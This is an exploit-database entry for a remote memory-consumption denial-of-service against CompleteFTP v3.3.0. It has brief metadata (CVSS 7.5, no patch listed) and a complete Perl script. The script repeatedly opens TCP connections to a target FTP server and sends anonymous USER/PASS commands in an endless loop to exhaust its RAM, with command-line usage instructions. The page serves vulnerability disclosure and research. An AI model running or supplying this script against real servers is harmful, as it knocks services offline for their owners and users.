header-logo
Suggest Exploit
vendor:
CompleteFTP
by:
Jonathan Salwan
7.5
CVSS
HIGH
Remote Memory Consumption DoS
CWE
Product Name: CompleteFTP
Affected Version From: CompleteFTP v3.3.0
Affected Version To: CompleteFTP v3.3.0
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

CompleteFTP v3.3.0 – Remote Memory Consumption DoS

This exploit targets CompleteFTP v3.3.0 and causes remote memory consumption denial of service. The exploit saturates the RAM to approximately 2GB in around 60 seconds.

Mitigation:

No known mitigation or remediation for this vulnerability.
Source

Exploit-DB raw data:

#!/usr/bin/perl
#
# Title:   CompleteFTP v3.3.0 - Remote Memory Consumption DoS
# Author:  Jonathan Salwan <submit(!)shell-storm.org>
# Web:     http://www.shell-storm.org
# 
# ~60 sec for satured ~2Go RAM
#

use IO::Socket;

print "\n[x]CompleteFTP v3.3.0 - Remote Memory Consumption DoS\n";

	if (@ARGV < 1)
		{
 		print "[-] Usage: <file.pl> <host> <port>\n";
 		print "[-] Exemple: file.pl 127.0.0.1 21\n\n";
 		exit;
		}

	$ip 	= $ARGV[0];
	$port 	= $ARGV[1];
	$login 	= "USER anonymous\r\n";
	$pwd 	= "PASS anonymous\r\n";

	$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$ip", PeerPort => "$port") || die "[-] Connecting: Failed!\n";

	print "Please Wait...\n";

	while(){
		$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$ip", PeerPort => "$port");
		$socket->recv($answer,2048);
		$socket->send($login);
		$socket->send($pwd);
		}